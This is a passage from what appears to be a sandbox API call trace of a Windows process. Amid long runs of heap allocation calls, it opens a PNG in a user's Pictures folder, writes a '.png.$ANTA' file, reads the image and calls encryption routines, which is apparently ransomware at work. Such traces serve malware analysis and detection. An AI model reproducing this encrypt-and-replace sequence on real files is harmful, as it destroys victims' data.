HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.498] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7mfkscm1jm586ad_.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0092.498] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.498] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.498] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.498] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0092.499] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a43f8 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.499] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.500] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7mfkscm1jm586ad_.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.500] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0092.500] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0092.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.503] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0092.503] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x6f4b, lpOverlapped=0x0) returned 1 [0092.505] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0092.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6f4b) returned 0x4516010 [0092.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0092.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6f4b) returned 0x451cf68 [0092.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0092.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.508] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.508] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6f4b) returned 0x4516010 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.509] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0092.509] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.509] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0092.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6f4b) returned 0x4516010 [0092.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0092.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa30 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6f4b) returned 0x4523ec0 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0092.511] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0092.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0092.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0092.512] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0092.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0092.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.512] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0092.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0092.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0092.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0092.512] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0092.513] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0092.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.513] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0092.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0092.514] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0092.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0092.514] 